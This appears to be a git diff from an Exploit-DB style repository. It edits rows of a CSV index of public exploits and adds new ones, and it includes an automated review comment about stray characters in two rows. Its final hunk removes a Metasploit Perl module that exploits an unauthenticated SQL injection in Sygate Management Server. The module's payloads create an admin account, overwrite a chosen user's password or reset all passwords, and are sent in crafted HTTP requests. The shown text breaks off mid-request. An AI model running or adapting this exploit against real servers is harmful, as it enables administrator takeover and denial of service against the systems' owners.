Buffer Overflow",2008-01-08,MC,bsd,remote,49 +10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection",2007-09-17,patrick,cgi,webapps,443 +10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - ""Secure"" Overflow",2004-07-18,onetwo,linux,remote,7787 +10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution",2001-09-01,"H D Moore",irix,remote,515 +10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20, 11.00, 11.11 - Command Execution",2002-08-28,"H D Moore",hp-ux,remote,515 +10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow",2008-01-08,MC,bsd,remote,49 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based)",2001-12-12,I)ruid,solaris,remote,0 -10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b CGI Overflow",2004-08-19,skape,cgi,webapps,0 +10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow",2004-08-19,skape,cgi,webapps,0 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0 10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 
@@ -9436,7 +9436,7 @@ id,file,description,date,author,platform,type,port 10062,platforms/windows/dos/10062.py,"Novell eDirectory 883ftf3 nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 10064,platforms/php/webapps/10064.txt,"Joomla CB Resume Builder - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 10067,platforms/php/webapps/10067.txt,"Joomla Soundset 1.0 - SQL Injection",2009-10-05,kaMtiEz,php,webapps,0 -10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 +10068,platforms/windows/dos/10068.rb,"Microsoft Windows 2000-2008 - Embedded OpenType Font Engine Remote Code Execution",2009-11-12,"H D Moore",windows,dos,0 10069,platforms/php/webapps/10069.php,"Empire CMS 47 SQL Injection",2009-10-05,"Securitylab Security Research",php,webapps,0 10070,platforms/windows/remote/10070.php,"IBM Informix Client SDK 3.0 nfx file integer overflow exploit",2009-10-05,bruiser,windows,remote,0 10071,platforms/multiple/remote/10071.txt,"Mozilla NSS NULL Character CA SSL Certificate Validation Security Bypass Vulnerability",2009-11-10,"Dan Kaminsky",multiple,remote,0 
@@ -11180,7 +11180,7 @@ id,file,description,date,author,platform,type,port 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 -12255,platforms/windows/local/12255.rb,"Winamp 5.572 whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0 +12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0 12257,platforms/php/webapps/12257.txt,"joomla component com_manager 1.5.3 - (id) SQL Injection Vulnerability",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12258,platforms/windows/dos/12258.py,"Proof of Concept for MS10-006 SMB Client-Side Bug",2010-04-16,"laurent gaffie",windows,dos,0 
@@ -12628,7 +12628,7 @@ id,file,description,date,author,platform,type,port 14408,platforms/windows/dos/14408.py,"Really Simple IM 1.3beta DoS Proof of Concept",2010-07-18,loneferret,windows,dos,0 14409,platforms/aix/remote/14409.pl,"AIX5l with FTP-Server Remote Root Hash Disclosure Exploit",2010-07-18,kingcope,aix,remote,0 14410,platforms/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps,0 -14412,platforms/windows/remote/14412.rb,"Hero DVD Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0 +14412,platforms/windows/remote/14412.rb,"Hero DVD - Buffer Overflow Exploit (meta)",2010-07-19,Madjix,windows,remote,0 14413,platforms/windows/dos/14413.txt,"IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control",2010-07-20,"Beenu Arora",windows,dos,0 14414,platforms/windows/dos/14414.txt,"Unreal Tournament 3 2.1 'STEAMBLOB' Command Remote Denial of Service Vulnerability",2010-07-20,"Luigi Auriemma",windows,dos,0 14415,platforms/php/webapps/14415.html,"EZ-Oscommerce 3.1 - Remote File Upload",2010-07-20,indoushka,php,webapps,0 
@@ -13066,7 +13066,7 @@ id,file,description,date,author,platform,type,port 15011,platforms/php/webapps/15011.txt,"moaub #15 - php microcms 1.0.1 - Multiple Vulnerabilities",2010-09-15,Abysssec,php,webapps,0 15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH exploit",2010-09-15,"sanjeev gupta",windows,local,0 15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0 -15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 +15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0 15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 .mp3 and .wma Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0 15018,platforms/asp/webapps/15018.txt,"moaub #16 - mojoportal Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0 15019,platforms/windows/dos/15019.txt,"MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0 
@@ -13182,7 +13182,7 @@ id,file,description,date,author,platform,type,port
 15177,platforms/php/webapps/15177.pl,"iGaming CMS <= 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure Exploit",2010-10-02,ZoRLu,asp,webapps,0
 15184,platforms/windows/local/15184.c,"AudioTran 1.4.2.4 SafeSEH+SEHOP Exploit",2010-10-02,x90c,windows,local,0
-15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
+15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Stored Cross Site Scripting Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
 15186,platforms/hardware/remote/15186.txt,"iOS FileApp < 2.0 - Directory Traversal Vulnerability",2010-10-02,m0ebiusc0de,hardware,remote,0
 15188,platforms/hardware/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service Exploit",2010-10-02,m0ebiusc0de,hardware,dos,0
 15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) LDAP Injection Vulnerability",2010-10-02,sqlhacker,asp,webapps,0
@@ -14433,7 +14433,7 @@ id,file,description,date,author,platform,type,port
 16650,platforms/windows/local/16650.rb,"Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)",2010-09-25,metasploit,windows,local,0
 16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-25,metasploit,windows,local,0
-16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
+16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0
 16654,platforms/windows/local/16654.rb,"Orbital Viewer ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0
 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0
 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0
@@ -14535,7 +14535,7 @@ id,file,description,date,author,platform,type,port
 16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80
 16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80
 16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80
-16755,platforms/windows/remote/16755.rb,"Novell iManager getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
+16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080
 16756,platforms/windows/remote/16756.rb,"Sambar 6 Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80
 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300
 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999
@@ -14687,7 +14687,7 @@ id,file,description,date,author,platform,type,port
 16907,platforms/hardware/webapps/16907.rb,"Google Appliance ProxyStyleSheet Command Execution",2010-07-01,metasploit,hardware,webapps,0
 16908,platforms/cgi/webapps/16908.rb,"Nagios3 statuswml.cgi Ping Command Execution",2010-07-14,metasploit,cgi,webapps,0
 16909,platforms/php/webapps/16909.rb,"Coppermine Photo Gallery <= 1.4.14 picEditor.php Command Execution",2010-07-03,metasploit,php,webapps,0
-16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing Command Injection",2011-01-08,metasploit,linux,remote,0
+16910,platforms/linux/remote/16910.rb,"Mitel Audio and Web Conferencing - Command Injection",2011-01-08,metasploit,linux,remote,0
 16911,platforms/php/webapps/16911.rb,"TikiWiki tiki-graph_formula Remote PHP Code Execution",2010-09-20,metasploit,php,webapps,0
 16912,platforms/php/webapps/16912.rb,"Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include",2010-11-24,metasploit,php,webapps,0
 16913,platforms/php/webapps/16913.rb,"PhpMyAdmin Config File Code Injection",2010-07-03,metasploit,php,webapps,0
@@ -14762,7 +14762,7 @@ id,file,description,date,author,platform,type,port
 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0
 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0
 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0
-16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
+16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader - Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0
 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 Improper Permissions",2011-03-17,LiquidWorm,windows,local,0
 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 - Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0
 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0
@@ -14924,7 +14924,7 @@ id,file,description,date,author,platform,type,port
 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0
 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0
 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0
-17177,platforms/windows/local/17177.rb,"MS Word Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
+17177,platforms/windows/local/17177.rb,"MS Word - Record Parsing Buffer Overflow MS09-027 (meta)",2011-04-16,"Andrew King",windows,local,0
 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0
 17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0
 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0
@@ -15093,7 +15093,7 @@ id,file,description,date,author,platform,type,port
 17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0
 17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0
-17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
+17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0
 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0
 17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0
@@ -15165,7 +15165,7 @@ id,file,description,date,author,platform,type,port
 17473,platforms/windows/local/17473.txt,"Adobe Reader X Atom Type Confusion Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17474,platforms/windows/local/17474.txt,"MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit",2011-07-03,Snake,windows,local,0
 17475,platforms/asp/webapps/17475.txt,"DmxReady News Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
-17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
+17476,platforms/windows/dos/17476.rb,"Microsoft IIS FTP Server <= 7.0 - Stack Exhaustion DoS [MS09-053]",2011-07-03,"Myo Soe",windows,dos,0
 17477,platforms/php/webapps/17477.txt,"phpDealerLocator Multiple SQL Injection Vulnerabilities",2011-07-03,"Robert Cooper",php,webapps,0
 17478,platforms/asp/webapps/17478.txt,"DMXReady Registration Manager 1.2 - SQL Injection Vulneratbility",2011-07-03,Bellatrix,asp,webapps,0
 17479,platforms/asp/webapps/17479.txt,"DmxReady Contact Us Manager 1.2 - SQL Injection Vulnerability",2011-07-03,Bellatrix,asp,webapps,0
@@ -15312,7 +15312,7 @@ id,file,description,date,author,platform,type,port
 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2011-08-10,metasploit,windows,remote,0
 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 DOM Cross Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass Exploit",2011-08-11,"C4SS!0 G0M3S",windows,local,0
-17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
+17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control <= 2010.0.0.3 - Trusted Integer Dereference",2011-08-11,metasploit,windows,remote,0
 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 Denial of Servive Exploit",2011-08-12,G13,windows,dos,0
 17659,platforms/windows/remote/17659.rb,"MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow",2011-08-13,metasploit,windows,remote,0
 17660,platforms/php/webapps/17660.txt,"videoDB <= 3.1.0 - SQL Injection Vulnerability",2011-08-13,seceurityoverun,php,webapps,0
@@ -16632,7 +16632,7 @@ id,file,description,date,author,platform,type,port
 19270,platforms/linux/local/19270.c,"Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability",1999-02-25,c0nd0r,linux,local,0
 19271,platforms/linux/dos/19271.c,"Linux kernel 2.0 TCP Port DoS Vulnerability",1999-01-19,"David Schwartz",linux,dos,0
 19272,platforms/linux/local/19272,"Linux kernel 2.2 ldd core Vulnerability",1999-01-26,"Dan Burcaw",linux,local,0
-19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
+19273,platforms/irix/local/19273.sh,"SGI IRIX 6.2 - day5notifier Vulnerability",1997-05-16,"Mike Neuman",irix,local,0
 19274,platforms/irix/local/19274.c,"SGI IRIX <= 6.3 df Vulnerability",1997-05-24,"David Hedley",irix,local,0
 19275,platforms/irix/local/19275.c,"SGI IRIX <= 6.4 datman/cdman Vulnerability",1996-12-09,"Yuri Volobuev",irix,local,0
 19276,platforms/irix/local/19276.c,"SGI IRIX <= 6.2 eject Vulnerability (1)",1997-05-25,DCRH,irix,local,0
@@ -21635,7 +21635,7 @@ id,file,description,date,author,platform,type,port
 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
 24465,platforms/php/webapps/24465.txt,"CubeCart 5.2.0 (cubecart.class.php) PHP Object Injection Vulnerability",2013-02-07,EgiX,php,webapps,0
 24466,platforms/hardware/webapps/24466.txt,"WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-07,Vulnerability-Lab,hardware,webapps,0
-24467,platforms/windows/remote/24467.rb,"ActFax 5.01 RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
+24467,platforms/windows/remote/24467.rb,"ActFax 5.01 - RAW Server Exploit",2013-02-07,"Craig Freyman",windows,remote,0
 24468,platforms/windows/dos/24468.pl,"KMPlayer Denial of Service All Versions",2013-02-10,Jigsaw,windows,dos,0
 24472,platforms/php/webapps/24472.txt,"Easy Live Shop System SQL Injection Vulnerability",2013-02-10,"Ramdan Yantu",php,webapps,0
 24474,platforms/windows/dos/24474.py,"Schneider Electric Accutech Manager Heap Overflow PoC",2013-02-10,"Evren Yal?n",windows,dos,0
@@ -29184,3 +29184,22 @@ id,file,description,date,author,platform,type,port
 32415,platforms/php/webapps/32415.txt,"Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities",2008-09-24,"Justin C. Klein Keane",php,webapps,0
 32416,platforms/php/remote/32416.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (1)",2008-09-25,80sec,php,remote,0
 32417,platforms/php/remote/32417.php,"PHP 5.2.6 'create_function()' Code Injection Weakness (2)",2008-09-25,80sec,php,remote,0
+32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 'site_search.php' Multiple SQL Injection Vulnerabilities",2008-09-25,"David Sopas",php,webapps,0
+32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 'fileadmin.php' Local File Include Vulnerability",2008-09-25,Pepelux,php,webapps,0
+32420,platforms/windows/dos/32420.c,"Mass Downloader Malformed Executable Denial Of Service Vulnerability",2008-09-25,Ciph3r,windows,dos,0
+32421,platforms/php/webapps/32421.html,"FlatPress 0.804 Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
+32422,platforms/php/webapps/32422.txt,"Vikingboard <= 0.2 Beta 'register.php' SQL Column Truncation Unauthorized Access Vulnerability",2008-09-25,StAkeR,php,webapps,0
+32423,platforms/jsp/webapps/32423.txt,"OpenNMS 1.5.x j_acegi_security_check j_username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
+32424,platforms/jsp/webapps/32424.txt,"OpenNMS 1.5.x notification/list.jsp username Parameter XSS",2008-09-25,d2d,jsp,webapps,0
+32425,platforms/jsp/webapps/32425.txt,"OpenNMS 1.5.x event/list filter Parameter XSS",2008-09-25,d2d,jsp,webapps,0
+32426,platforms/windows/remote/32426.c,"DATAC RealWin SCADA Server 2.0 Remote Stack Buffer Overflow Vulnerability",2008-09-26,"Ruben Santamarta ",windows,remote,0
+32427,platforms/php/webapps/32427.txt,"Barcode Generator 2.0 'LSTable.php' Remote File Include Vulnerability",2008-09-26,"Br0k3n H34rT",php,webapps,0
+32428,platforms/windows/dos/32428.txt,"ZoneAlarm 8.0.20 HTTP Proxy Remote Denial of Service Vulnerability",2008-09-26,quakerdoomer,windows,dos,0
+32429,platforms/windows/remote/32429.html,"Novell ZENworks Desktop Management 6.5 ActiveX Control 'CanUninstall()' Buffer Overflow Vulnerability",2008-09-27,Satan_HackerS,windows,remote,0
+32430,platforms/cgi/webapps/32430.txt,"WhoDomLite 1.1.3 'wholite.cgi' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",cgi,webapps,0
+32431,platforms/php/webapps/32431.txt,"Lyrics Script 'search_results.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
+32432,platforms/php/webapps/32432.txt,"Clickbank Portal 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
+32433,platforms/php/webapps/32433.txt,"Membership Script Multiple Cross Site Scripting Vulnerabilities",2008-09-27,"Ghost Hacker",php,webapps,0
+32434,platforms/php/webapps/32434.txt,"Recipe Script 'search.php' Cross Site Scripting Vulnerability",2008-09-27,"Ghost Hacker",php,webapps,0
+32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow Vulnerabil?ity (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0
+32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE Vulnerabilities",2014-03-22,"Brandon Perry",php,webapps,0
diff --git a/platforms/cgi/webapps/1680.pm b/platforms/cgi/webapps/1680.pm
index 9c5095555..5557f3599 100755
--- a/platforms/cgi/webapps/1680.pm
+++ b/platforms/cgi/webapps/1680.pm
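Review bot: The new row for id 32435 carries a stray character in its description field (`Vulnerabil?ity`), so the index entry no longer matches the title it is meant to describe; if the stored file really contains a literal `?` rather than a non-ASCII byte that the page could not render (the existing context row `Evren Yal?n` in the hunk at L34 shows the same pattern), the field should read `Stack Overflow Vulnerability (PoC)`. The author field of the new row for id 32426 also keeps a trailing space inside the quotes (`"Ruben Santamarta "`), which will break any exact-match lookup on that column; trimming it to `"Ruben Santamarta"` keeps it consistent with every other author value in the hunk.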
@@ -1,250 +1,249 @@
-
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-##
-#
-# Affected product : Sygate Management Server v4.1 (at least)
-#
-# Vulnerability : SQL-Injection in login page
-# Required privs : Network access to the admin interface (HTTP)
-# Impact : Raw access to the database
-# Sample payload : Create a valid admin account directly in the database
-#
-# Editor status : Official patch available
-# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
-#
-##
-
-package Msf::Exploit::sygate_policy_manager;
-use base "Msf::Exploit";
-use strict;
-use Pex::Text;
-use bytes;
-use vars qw{$HAS_SHA1};
-
-BEGIN
-{
- $HAS_SHA1 = 0;
-
- if (eval('require Digest::SHA1')) {
- eval('use Digest::SHA1 qw(sha1);');
- $HAS_SHA1 = 1;
- }
-}
-
-my $advanced = { };
-
-my $info = {
- 'Name' => 'Sygate Management Server SQL Injection',
- 'Version' => '$Revision: 1.3 $',
- 'Authors' => [ 'Nicob ' ],
- 'Arch' => [ 'x86' ],
- 'OS' => [ 'win32' ],
- 'Priv' => 0,
- 'UserOpts' =>
- {
- 'RHOST' => [1, 'ADDR', 'The target address'],
- 'RPORT' => [1, 'PORT', 'The target port', 80],
- 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
- 'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'],
- 'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
- 'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
- 'SSL' => [0, 'BOOL', 'Use SSL'],
- },
-
- 'Description' => Pex::Text::Freeform(qq{
- This module exploits a non authenticated SQL-Injection vulnerability in the
- Sygate Management Server (now Symantec Policy Manager), in order to create a new
- admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
- Version 5 is not vulnerable.
-}),
-
- 'Refs' =>
- [
- ['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
- ['CVE', '2006-0522'],
- ['OSVDB', '22883'],
- ['BID', '16452'],
- ],
-
- 'Targets' =>
- [
- ['Change a specific users password', 'change_user_passwd'],
- ['Create a new administrative account', 'add_account'],
- ['Reset all passwords (denial of service)', 'reset_all'],
- ],
-
- 'DefaultTarget' => 0,
-
- 'Keys' => ['sygate'],
-
- };
-
-sub new {
- my $class = shift;
- my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
- return($self);
-}
-
-sub Check {
- my $self = shift;
- my $target_host = $self->GetVar('RHOST');
- my $vhost = $self->VHost;
- my $target_port = $self->GetVar('RPORT');
- my $servlet = $self->GetVar('SERVLET');
-
- my $request =
- "GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
- "Accept: */*\r\n".
- "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
- "Host: $vhost:$target_port\r\n".
- "Connection: Close\r\n".
- "\r\n";
-
- my $s = Msf::Socket::Tcp->new(
- 'PeerAddr' => $target_host,
- 'PeerPort' => $target_port,
- 'SSL' => $self->GetVar('SSL'),
- );
-
- if ($s->IsError){
- $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
- return $self->CheckCode('Connect');
- }
-
- $self->PrintLine("[*] Establishing a connection to the target...");
-
- $s->Send($request);
- my $results = $s->Recv(-1, 20);
- $s->Close();
-
- if ($results =~ /HTTP\/1\..\s+200/) {
-
- $self->PrintLine("[*] Vulnerable server detected!");
- return $self->CheckCode('Confirmed');
-
- } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
-
- $self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
- return $self->CheckCode('Safe');
- }
-
- $self->PrintLine("[*] Generic error...");
- return $self->CheckCode('Generic');
-}
-
-sub Exploit {
- my $self = shift;
- my $target_host = $self->GetVar('RHOST');
- my $vhost = $self->VHost;
- my $target_port = $self->GetVar('RPORT');
- my $servlet = $self->GetVar('SERVLET');
- my $login = $self->GetVar('LOGIN');
- my $passwd = $self->GetVar('PASSWD');
- my $target = $self->Targets->[$self->GetVar('TARGET')];
-
- if (! $HAS_SHA1) {
- $self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
- return;
- }
-
- # The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
- my $sha1 = sha1($login.$passwd);
- $sha1 =~ s/./sprintf("%02x", ord($&))/ges;
- $sha1 = "0x".uc($sha1);
-
- # Maximum level of privileges
- my $privs = "255";
-
-
- my %sqlpayloads =
- (
- # Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
- 'add_account' =>
- "insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
- "AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
- "values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
-
- # Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
- 'reset_all' =>
- "update CMS35.Admin set Password=cast('AA' as varbinary)",
-
- # Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
- 'change_user_passwd' =>
- "update CMS35.Admin set Password=$sha1 where LoginName='$login'",
- );
-
- my $payload = $sqlpayloads{ $target->[1] };
-
- # Inject our payload
- $servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo";
-
- my $request =
- "GET $servlet HTTP/1.1\r\n".
- "Accept: */*\r\n".
- "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
- "Host: $vhost:$target_port\r\n".
- "Connection: Close\r\n".
- "\r\n";
-
- my $s = Msf::Socket::Tcp->new(
- 'PeerAddr' => $target_host,
- 'PeerPort' => $target_port,
- 'SSL' => $self->GetVar('SSL'),
